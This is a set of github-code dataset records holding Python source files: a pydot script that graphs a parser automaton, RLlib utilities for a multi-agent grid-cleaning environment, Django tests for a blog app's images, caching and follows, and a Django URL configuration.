"file_name": "logreg_predict.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.loadtxt", "line_number": 12, "usage_type": "call"}, {"api_name": "logistic_regression.MyLR", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "29465812363", "text": "import pydot\nimport sys\nfrom tqdm import tqdm\n\n#\tflex lexel.l\n#\tgcc -o parser parser.tab.c lex.yy.c -lfl\n#\tdot -Tsvg parser.dot > parser.svg\n\nfile_inp = sys.argv[1]\n\ngraph = pydot.Dot(\"automata\", graph_type = \"digraph\")\ngraph.set_node_defaults(fontsize = '10')\ngraph.set_edge_defaults(fontsize = '9')\n\nnline = sum(1 for line in open(file_inp))\n# print(f\"have total of {nline} in file\")\n\nnode = \"\"\nlhs = \"\"\ntransfer_state = 0\ni = 0\n\nwith open(file_inp) as out:\n\n for line in tqdm(out, total=nline):\n\n i+=1\n\n words = line.split()\n\n if words and \"State\" == words[0] and len(words) == 2:\n # if \"State\" in words and len(words) == 2:\n # if \"State\" in line:\n node = words[1] # second word in line is node number.\n # print(f\"set node to {node} at line {i}, word is {words}\")\n continue\n\n start_node = \"S\" + node\n\n if \"go to\" in line:\n\n lhs = words[0]\n transfer_state = words[-1]\n\n end_node = \"S\" + transfer_state\n # print(f\"go to detected at line {i} from {start_node}, going to {end_node}, with {lhs}\")\n if \"shift\" in line: #shifting occurs iff its a terminal char. 
add green.\n                # print(\"recognized a terminal character\")\n                graph.add_edge(pydot.Edge(start_node, end_node, color = \"green\", label = lhs))\n\n            else: # non terminal\n                # print(\"recognized a non-terminal character\")\n                graph.add_edge(pydot.Edge(start_node, end_node, color = \"red\", label = lhs))\n\n            continue\n\n        if \" accept\" in line:  # accept state, add highlight!!\n\n            avail = graph.get_node(start_node)\n\n            if avail:\n                graph.get_node(start_node)[0].set_shape(\"box\")\n\n            else:\n                graph.add_node(pydot.Node(start_node, shape=\"box\"))\n\n\ngraph.write_raw(\"parser.dot\")", "repo_name": "shubh101295/GodSpeed", "sub_path": "src/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 1889, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pydot.Dot", "line_number": 11, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 25, "usage_type": "call"}, {"api_name": "pydot.Edge", "line_number": 49, "usage_type": "call"}, {"api_name": "pydot.Edge", "line_number": 53, "usage_type": "call"}, {"api_name": "pydot.Node", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "8314681363", "text": "from collections import namedtuple\nfrom copy import deepcopy\nfrom gym.spaces import Box, Discrete\nimport matplotlib\nimport numpy as np\nimport os\nfrom typing import Dict, Optional, Any, List, Tuple\nimport yaml\n\nfrom ray.rllib import RolloutWorker, BaseEnv, Policy\nfrom ray.rllib.agents import DefaultCallbacks, Trainer\nfrom ray.rllib.agents.dqn import DQNTrainer\nfrom ray.rllib.agents.ppo import PPOTrainer\nfrom ray.rllib.evaluation import MultiAgentEpisode\nfrom ray.rllib.utils.typing import PolicyID\nfrom ray.tune.logger import UnifiedLogger\n\nRAY_DIR = f\"{os.path.expanduser('~')}/ray_results\"\n\n\nclass Agent(object):\n    \"\"\"\n    Container for agent params\n    \"\"\"\n\n    def __init__(\n        self,\n        policy_name: str,\n        run_name: str,\n        agent_num: int,\n        config: Dict[str, Any],\n        seed: int,\n        heterogeneous: bool,\n    ):\n        assert policy_name in [\"ppo\", \"dqn\"], f\"unknown policy name: {policy_name}\"\n        self.policy_name = policy_name\n        self.run_name = run_name\n        self.agent_num = agent_num\n        self.config = config\n        self.seed = seed\n        self.heterogeneous = heterogeneous\n        self.trainer = None\n        self.results_dir = f\"{RAY_DIR}/{run_name}\"\n        self.name = f\"{run_name}:{agent_num}\"\n        self.eval_name = None\n\n\nclass Position(namedtuple(\"Position\", [\"i\", \"j\"])):\n    \"\"\"\n    Represents one space in the grid\n    \"\"\"\n\n    def __add__(self, other):\n        if isinstance(other, Position):\n            return Position(i=self.i + other.i, j=self.j + other.j)\n        elif isinstance(other, int):\n            return Position(i=self.i + other, j=self.j + other)\n        elif isinstance(other, tuple):\n            return Position(i=self.i + other[0], j=self.j + other[1])\n        else:\n            raise ValueError(\n                \"A Position can only be added to an int, a tuple, or another Position\"\n            )\n\n    def __sub__(self, other):\n        if isinstance(other, Position):\n            return Position(i=self.i - other.i, j=self.j - other.j)\n        elif isinstance(other, int):\n            return Position(i=self.i - other, j=self.j - other)\n        elif isinstance(other, tuple):\n            return Position(i=self.i - other[0], j=self.j - other[1])\n        else:\n            raise ValueError(\n                \"Only an int, a tuple, or another Position can be subtracted from a Position\"\n            )\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, Position):\n            return self.i == other.i and self.j == other.j\n        if isinstance(other, (tuple, list)):
\n            assert (\n                len(other) == 2\n            ), \"Position equality comparison must be with a length-2 sequence\"\n            return self.i == other[0] and self.j == other[1]\n        raise ValueError(\"A Position can only be compared with a Position-like item.\")\n\n\nclass CleanerCallbacks(DefaultCallbacks):\n    \"\"\"\n    Callbacks for custom metrics\n    \"\"\"\n\n    def __init__(self):\n        super().__init__()\n\n    def on_episode_start(\n        self,\n        *,\n        worker: RolloutWorker,\n        base_env: BaseEnv,\n        policies: Dict[PolicyID, Policy],\n        episode: MultiAgentEpisode,\n        env_index: Optional[int] = None,\n        **kwargs,\n    ) -> None:\n        episode.user_data[\"rewards\"] = list()\n\n    def on_episode_step(\n        self,\n        *,\n        worker: RolloutWorker,\n        base_env: BaseEnv,\n        episode: MultiAgentEpisode,\n        env_index: Optional[int] = None,\n        **kwargs,\n    ) -> None:\n        rewards = {}\n        for agent in base_env.get_unwrapped()[0].game.agent_pos.keys():\n            rewards[agent] = episode.prev_reward_for(agent)\n        episode.user_data[\"rewards\"].append(rewards)\n\n    def on_episode_end(\n        self,\n        *,\n        worker: RolloutWorker,\n        base_env: BaseEnv,\n        policies: Dict[PolicyID, Policy],\n        episode: MultiAgentEpisode,\n        env_index: Optional[int] = None,\n        **kwargs,\n    ) -> None:\n        # custom metrics get saved to the logfile\n        episode.custom_metrics[\"rewards\"] = sum(\n            [sum(list(rewards.values())) for rewards in episode.user_data[\"rewards\"]]\n        )\n\n\nMOVES = [\n    Position(0, 0),  # NOOP\n    Position(-1, 0),  # NORTH\n    Position(1, 0),  # SOUTH\n    Position(0, -1),  # WEST\n    Position(0, 1),  # EAST\n]\n\nMASKS = {\n    \"clean\": 0,\n    \"dirty\": 1,\n    \"wall\": 2,\n    \"agent\": 3,\n}\n\nCOLORS = matplotlib.colors.ListedColormap(\n    [\"green\", \"red\", \"grey\", \"white\"]  # 0 clean (and no agent), 1 dirty, 2 wall, 3 agent\n)\n\n\ndef grid_from_config(config: Dict[str, Any]) -> Dict[str, np.array]:\n    \"\"\"\n    Create grid from params\n    \"\"\"\n    env_config = config[\"env_config\"]\n    return grid_from_layout(env_config[\"layout\"])\n\n\ndef grid_from_layout(layout: str) -> Dict[str, np.array]:\n    \"\"\"\n    Convert human-readable layout to grid format used internally by CleanerGame\n\n    ''' {          clean:        dirty:        agent:       wall:\n    XXXXX         [0 0 0 0 0]   [0 0 0 0 0]   [0 0 0 0 0]  [1 1 1 1 1]\n    XADCX         [0 1 0 1 0]   [0 0 1 0 0]   [0 1 0 0 0]  [1 0 0 0 1]\n    XDDAX    =>   [0 0 0 1 0]   [0 1 1 0 0]   [0 0 0 1 0]  [1 0 0 0 1]\n    XXXXX         [0 0 0 0 0]   [0 0 0 0 0]   [0 0 0 0 0]  [1 1 1 1 1]\n    ''' }\n    \"\"\"\n    layout = np.array(\n        [\n            list(line)\n            for line in layout.replace(\" \", \"\").lstrip(\"\\n\").rstrip(\"\\n\").split(\"\\n\")\n        ]\n    )\n    height = len(layout)\n    width = len(layout[0])\n    grid = {mask: np.zeros((height, width)) for mask in MASKS.keys()}\n    num_agents = len(np.where(layout == \"A\")[0])\n    grid[\"dirty\"][np.where(layout == \"D\")] = 1\n    grid[\"clean\"][np.where(layout == \"C\")] = 1\n    grid[\"wall\"][np.where(layout == \"X\")] = 1\n    start_pos_list = np.where(layout == \"A\")\n    pos_list = [(start_pos_list[0][i], start_pos_list[1][i]) for i in range(num_agents)]\n    for i, j in pos_list:\n        grid[\"agent\"][i][j] = 1\n        grid[\"clean\"][i][j] = 1\n        grid[\"dirty\"][i][j] = 0\n    return grid\n\n\ndef grid_3d_to_2d(grid: Dict[str, np.array]) -> np.array:\n    \"\"\"\n    Squashes 4 layers into 1\n    \"\"\"\n    board = np.zeros(grid[\"clean\"].shape)\n    board[np.where(grid[\"clean\"])] = 0\n    board[np.where(grid[\"dirty\"])] = 1\n    board[np.where(grid[\"wall\"])] = 2\n    board[np.where(grid[\"agent\"])] = 3\n    return board\n\n\ndef agent_pos_from_grid(\n    grid: Dict[str, np.array], random_start: bool = False\n) -> List[Position]:\n    \"\"\"\n    Return a list of 
agent positions from the grid -- top to bottom, left to right by default\n \"\"\"\n agent_pos = np.where(grid[\"agent\"])\n num_agents = len(agent_pos[0])\n agent_order = (\n np.random.permutation(num_agents) if random_start else range(num_agents)\n )\n return [Position(agent_pos[0][num], agent_pos[1][num]) for num in agent_order]\n\n\ndef obs_dims(config: Dict[str, Any]) -> Tuple[int, int, int]:\n \"\"\"\n Get dimensions of agent observations\n \"\"\"\n grid = grid_from_config(config)\n dims = (len(grid[\"clean\"]), len(grid[\"clean\"][0]), 5)\n return dims\n\n\ndef create_trainer(\n policy_name: str,\n agents: Dict[str, Agent],\n config: Dict[str, Any],\n results_dir: str,\n seed: int = 1,\n heterogeneous: bool = True,\n num_workers: int = 1,\n) -> Trainer:\n \"\"\"\n Create a trainer object for the given agents and params\n \"\"\"\n obs_shape = obs_dims(config)\n obs_space = Box(0, 1, obs_shape, dtype=np.int32)\n action_space = Discrete(5)\n policy = (None, obs_space, action_space, {})\n if heterogeneous:\n multi_agent_config = {\n \"policies\": {agent_name: deepcopy(policy) for agent_name in agents.keys()},\n \"policy_mapping_fn\": lambda agent_name: agent_name,\n }\n else:\n multi_agent_config = {\n \"policies\": {\"agent_policy\": policy},\n \"policy_mapping_fn\": lambda agent_name: \"agent_policy\",\n }\n kernel_0_dim = [config[\"model_config\"][\"conv_kernel_size\"]] * 2\n kernel_1_dim = list(obs_shape[:2])\n model_config = {\n \"conv_filters\": [\n [16, kernel_0_dim, 1],\n [32, kernel_1_dim, 1],\n ],\n \"conv_activation\": \"relu\",\n }\n eval_config = {\"verbose\": config[\"run_config\"][\"verbose\"]}\n config[\"ray_config\"][\"num_workers\"] = num_workers\n trainer_config = {\n \"num_gpus\": int(os.environ.get(\"RLLIB_NUM_GPUS\", \"0\")),\n \"multiagent\": multi_agent_config,\n \"model\": model_config,\n \"env_config\": config[\"env_config\"],\n \"callbacks\": DefaultCallbacks,\n \"evaluation_config\": eval_config,\n \"seed\": seed,\n **config[\"ray_config\"],\n }\n\n if policy_name == \"ppo\":\n trainer = PPOTrainer(\n trainer_config,\n \"ZSC-Cleaner\",\n logger_creator=lambda cfg: UnifiedLogger(cfg, results_dir),\n )\n elif policy_name == \"dqn\":\n trainer = DQNTrainer(\n trainer_config,\n \"ZSC-Cleaner\",\n logger_creator=lambda cfg: UnifiedLogger(cfg, results_dir),\n )\n else:\n print(f\"trainer not implemented for policy: {policy_name}\")\n trainer = None\n return trainer\n\n\ndef save_trainer(trainer: Trainer, path: str = None, verbose: bool = True) -> Optional[str]:\n \"\"\"\n Save trainer to file\n \"\"\"\n save_path = trainer.save(path)\n if verbose:\n print(f\"saved trainer at {save_path}\")\n return save_path\n\n\ndef load_config(config_name: str) -> Dict[str, Any]:\n \"\"\"\n Load params from file\n \"\"\"\n fname = f\"configs/{config_name}.yaml\"\n try:\n with open(fname, \"r\") as f:\n config = yaml.safe_load(f.read())\n return config\n except FileNotFoundError:\n print(f\"bad config path: {fname}\")\n", "repo_name": "bengreenberg5/zsc-cleaner", "sub_path": "cleaner/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 9740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.expanduser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": 
"collections.namedtuple", "line_number": 48, "usage_type": "call"}, {"api_name": "ray.rllib.agents.DefaultCallbacks", "line_number": 88, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 99, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.utils.typing.PolicyID", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.Policy", "line_number": 101, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 103, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 111, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 112, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 113, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 114, "usage_type": "name"}, {"api_name": "ray.rllib.RolloutWorker", "line_number": 125, "usage_type": "name"}, {"api_name": "ray.rllib.BaseEnv", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.utils.typing.PolicyID", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.Policy", "line_number": 127, "usage_type": "name"}, {"api_name": "ray.rllib.evaluation.MultiAgentEpisode", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 153, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 190, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 207, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 212, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 220, "usage_type": "attribute"}, 
{"api_name": "typing.List", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 236, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 248, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 252, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 272, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 272, "usage_type": "attribute"}, {"api_name": "ray.rllib.agents.DefaultCallbacks", "line_number": 276, "usage_type": "name"}, {"api_name": "ray.rllib.agents.ppo.PPOTrainer", "line_number": 283, "usage_type": "call"}, {"api_name": "ray.tune.logger.UnifiedLogger", "line_number": 286, "usage_type": "call"}, {"api_name": "ray.rllib.agents.dqn.DQNTrainer", "line_number": 289, "usage_type": "call"}, {"api_name": "ray.tune.logger.UnifiedLogger", "line_number": 292, "usage_type": "call"}, {"api_name": "ray.rllib.agents.Trainer", "line_number": 242, "usage_type": "name"}, {"api_name": "ray.rllib.agents.Trainer", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 300, "usage_type": "name"}, {"api_name": "yaml.safe_load", "line_number": 317, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 310, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 310, "usage_type": "name"}]} +{"seq_id": "12843328647", "text": "import shutil\nimport tempfile\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom ..models import Follow, Group, Post\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\nUser = get_user_model()\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user_author = User.objects.create_user(username='Author')\n cls.user_commentator = User.objects.create_user(username='Commentator')\n cls.group_test = Group.objects.create(\n title='Тестовая группа',\n slug='Grouptest',\n description='testtesttesttesttest'\n )\n\n cls.image = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n\n cls.uploaded = SimpleUploadedFile(\n name='test_small.gif',\n content=cls.image,\n content_type='image/gif'\n )\n\n cls.post_with_img = Post.objects.create(\n text='TESTOVIEEEEEE',\n author=cls.user_author,\n image=cls.uploaded,\n group=cls.group_test,\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.author_client = Client()\n self.author_client.force_login(self.user_author)\n 
self.commentator_client = Client()\n self.commentator_client.force_login(self.user_commentator)\n cache.clear()\n\n def test_sorl_thumbnail_index(self):\n \"\"\"Пост с картинкой передаётся в словаре context (index)\"\"\"\n response = self.guest_client.get(reverse('posts:index'))\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_profile(self):\n \"\"\"Пост с картинкой передаётся в словаре context (profile)\"\"\"\n response = self.guest_client.get(\n reverse(\n 'posts:profile', kwargs={'username': self.user_author.username}\n )\n )\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_group(self):\n \"\"\"Пост с картинкой передаётся в словаре context (group_list)\"\"\"\n response = self.guest_client.get(\n reverse('posts:group_list', kwargs={'slug': self.group_test.slug})\n )\n self.assertIn(\n self.uploaded.name, response.context['page_obj'][0].image.name\n )\n\n def test_sorl_thumbnail_post_detail(self):\n \"\"\"Пост с картинкой передаётся в словаре context (post_detail)\"\"\"\n response = self.guest_client.get(\n reverse(\n 'posts:post_detail', kwargs={'post_id': self.post_with_img.pk}\n )\n )\n self.assertIn(\n self.uploaded.name, response.context['post'].image.name\n )\n\n def test_sorl_thumbnail_PostForm(self):\n \"\"\"при отправке поста с картинкой через форму\n PostForm создаётся запись в базе данных\"\"\"\n form_data = {\n 'text': 'Текст для проверки PostForm и картинки',\n 'group': self.group_test.pk,\n 'image': self.uploaded.name,\n }\n self.author_client.post(reverse('posts:post_create'), data=form_data)\n self.assertTrue(Post.objects.filter(\n text=form_data['text'],\n ).exists())\n\n def test_cache_page(self):\n \"\"\"Список постов на главной странице сайта хранится в кэше\"\"\"\n test_post_cache = Post.objects.create(\n text='Тест для проверки кэширования',\n author=self.user_author,\n )\n response = self.guest_client.get(reverse('posts:index'))\n test_post_cache.delete()\n response_cache = self.guest_client.get(reverse('posts:index'))\n\n self.assertEqual(response.content, response_cache.content)\n\n cache.clear()\n response_cache = self.guest_client.get(reverse('posts:index'))\n self.assertNotEqual(response.content, response_cache.content)\n\n def test_404(self):\n \"\"\"404 отдаёт кастомный шаблон.\"\"\"\n response = self.guest_client.get('/nothingpage')\n self.assertTemplateUsed(response, 'core/404.html')\n\n def test_1(self):\n \"\"\"Авторизованный пользователь может\n подписываться на других пользователей и удалять их из подписок.\"\"\"\n\n self.commentator_client.get(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.user_author.username}\n )\n )\n self.assertTrue(\n Follow.objects.filter(author=self.user_author).exists()\n )\n\n self.commentator_client.get(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.user_author.username}\n )\n )\n self.assertFalse(\n Follow.objects.filter(author=self.user_author).exists()\n )\n\n def test_2(self):\n \"\"\"\n Новая запись пользователя появляется в ленте тех,\n кто на него подписан и не появляется в ленте тех, кто не подписан.\n \"\"\"\n test_post_follow = Post.objects.create(\n text='Тестовый пост для follow',\n author=self.user_author,\n )\n test_follow = Follow.objects.create(\n user=self.user_commentator,\n author=self.user_author\n )\n response = self.commentator_client.get(reverse('posts:follow_index'))\n self.assertContains(response, test_post_follow.text)\n\n 
test_follow.delete()\n response = self.commentator_client.get(reverse('posts:follow_index'))\n self.assertNotContains(response, test_post_follow.text)\n", "repo_name": "arhipvp/hw05_final", "sub_path": "yatube/posts/tests/test_cache_and_img.py", "file_name": "test_cache_and_img.py", "file_ext": "py", "file_size_in_byte": 6728, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tempfile.mkdtemp", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 15, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Group.objects.create", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 25, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Post.objects.create", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 46, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 56, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 59, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 60, "usage_type": "call"}, {"api_name": "django.test.Client", "line_number": 62, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 64, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 113, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 119, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 123, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.core.cache.cache.clear", "line_number": 129, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 129, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 130, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 143, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 149, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 149, "usage_type": "name"}, {"api_name": 
"django.urls.reverse", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 159, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 167, "usage_type": "name"}, {"api_name": "models.Follow.objects.create", "line_number": 171, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 171, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 175, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 179, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "4961997050", "text": "from django.urls import path, include\n\nfrom knox.views import LogoutView\n\nfrom .api.student import get_student_info, get_student_course_list, get_student_choice_list, create_choice\nfrom .views import UserAPIView, RegisterAPIView, LoginAPIView\n\nurlpatterns = [\n path('user/', UserAPIView.as_view()),\n path('register/', RegisterAPIView.as_view()),\n path('login/', LoginAPIView.as_view()),\n path('logout/', LogoutView.as_view(), name='knox_logout'),\n path('get_student_info/', get_student_info),\n path('get_student_course_list/', get_student_course_list),\n path('get_student_choice_list/', get_student_choice_list),\n path('create_choice/', create_choice),\n]\n", "repo_name": "SBidaibek/SanaX", "sub_path": "backend/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 679, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.UserAPIView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.UserAPIView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.RegisterAPIView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.RegisterAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.LoginAPIView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.LoginAPIView", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "knox.views.LogoutView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "knox.views.LogoutView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "api.student.get_student_info", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "api.student.get_student_course_list", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "api.student.get_student_choice_list", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, 
